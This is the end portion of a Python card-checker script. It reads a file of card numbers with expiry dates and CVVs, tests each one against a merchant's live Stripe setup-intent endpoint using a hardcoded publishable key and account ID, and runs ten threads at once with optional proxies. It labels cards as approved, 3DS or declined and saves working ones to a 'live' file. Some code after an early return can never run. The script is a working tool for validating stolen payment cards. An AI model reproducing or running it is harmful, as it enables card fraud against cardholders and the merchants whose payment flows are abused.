            "use_stripe_sdk": "true",
            "key": "pk_live_51MtlQ6JHp4HnCB3mIdw1klpZ1l4iEu7OhIeSTgo53ozEsNCvClWn6FLleoktpSGwhiWuqalzc0RxDIYs3qLwhxsZ00ACUWi9Nt",
            "_stripe_account": "acct_1MtlQ6JHp4HnCB3m",
            "_stripe_version": "2022-08-01",
            "client_attribution_metadata[client_session_id]": "32ed3c7e-5d86-4cbb-abad-e225fabf1010",
            "client_attribution_metadata[merchant_integration_source]": "elements",
            "client_attribution_metadata[merchant_integration_subtype]": "card-element",
            "client_attribution_metadata[merchant_integration_version]": "2017",
            "client_secret": clientSecret
        }

        rr = see.post(
            f'https://api.stripe.com/v1/setup_intents/{seti}/confirm',
            headers=headers,
            data=data,
            verify=False
        )
        res = rr.json()

        si = res.get("setup_intent") or res
        status = si.get("status")

        err = res.get("error") or {}
        last_err = si.get("last_setup_error") or si.get("last_payment_error") or {}

        e = last_err or err or {}

        decline_code = e.get("decline_code") or e.get("message") or e.get("code")

        next_action = si.get("next_action") or {}

        if status == "succeeded":
            safe_print(
                f"    {GREEN}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{GREEN}{rr.status_code} {WHITE}--> {GREEN}Succeeded.{RESET}"
            )
            return True

        elif status == "requires_action" or next_action:
            safe_print(
                f"    {BLUE}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{BLUE}{rr.status_code} {WHITE}--> {BLUE}Three3ds Secure.{RESET}"
            )
            return False

        elif status == "requires_payment_method" or err:
            safe_print(
                f"    {RED}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{RED}{rr.status_code} {WHITE}--> {RED}{decline_code}{RESET}"
            )
            return False

        else:
            print(rr.text)




        return False

        if "your card was declined" in txtlower:
            safe_print(
                f"    {RED}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{RED}{acode} {WHITE}--> {RED}Your card was declined.{RESET}"
            )

            return False

        elif "your card number is incorrect" in txtlower:
            safe_print(
                f"    {RED}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{RED}{acode} {WHITE}--> {RED}Your card number is incorrect.{RESET}"
            )
            return False

        elif "insufficient funds" in txtlower:
            safe_print(
                f"    {GREEN}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{GREEN}{acode} {WHITE}--> {GREEN}Your card has insufficient funds.{RESET}"
            )
            return True

        else:
            safe_print(
                f"    {GREEN}⭢ {WHITE}{cc}|{mm}|{yy}|{cvv} <-- "
                f"{GREEN}{acode} {WHITE}--> {GREEN}Donation $1 Approved.{RESET}"
            )
            return True


        try:
            raw = r.json()
        except Exception:
            raw = r.text.strip()

        data = ResponseNormalizer.normalize(raw)

        result = flow.handle(
            data,
            cc,
            mm,
            yy,
            cvv,
            filename="live.txt"
        )

        return result

        #     return True

        # else:


    except Exception as e:
        print(e)
        return None

    finally:
        see.close()

from concurrent.futures import ThreadPoolExecutor
NUM_THREADS = 10

def start_worker_pool(lines, proxy):
    def task(line):
        checkx(line, proxy=proxy)

    with ThreadPoolExecutor(max_workers=NUM_THREADS) as executor:
        executor.map(task, lines)

def main():
    os.system("cls" if os.name == "nt" else "clear")

    try:
        combo_path = r"card.txt"
        proxy_input = ""
        # combo_path = input("Enter combo file path (.txt, utf-8): ").strip().strip('"')
        # proxy_input = input("Enter proxy (user:pass@ip:port) or ENTER for no proxy: ").strip()
        proxy = proxy_input or None

        if not combo_path:
            raise ValueError("Combo file path cannot be empty.")

        if not combo_path.lower().endswith(".txt"):
            raise ValueError("Combo file must be a .txt file.")

        if not os.path.isfile(combo_path):
            raise FileNotFoundError(f"File not found: {combo_path}")

        try:
            with open(combo_path, "r", encoding="utf-8", errors="strict") as f:
                lines = [line.strip() for line in f if line.strip()]
        except UnicodeDecodeError:
            raise ValueError("Combo file must be UTF-8 encoded.")

        if not lines:
            raise ValueError("Combo file is empty.")


        start_worker_pool(lines, proxy)

    except KeyboardInterrupt:
        print("\nCancelled by user.")

    except Exception as e:
        print(f"Error: {e}")
        input("Press ENTER to exit...")


if __name__ == "__main__":
    main()

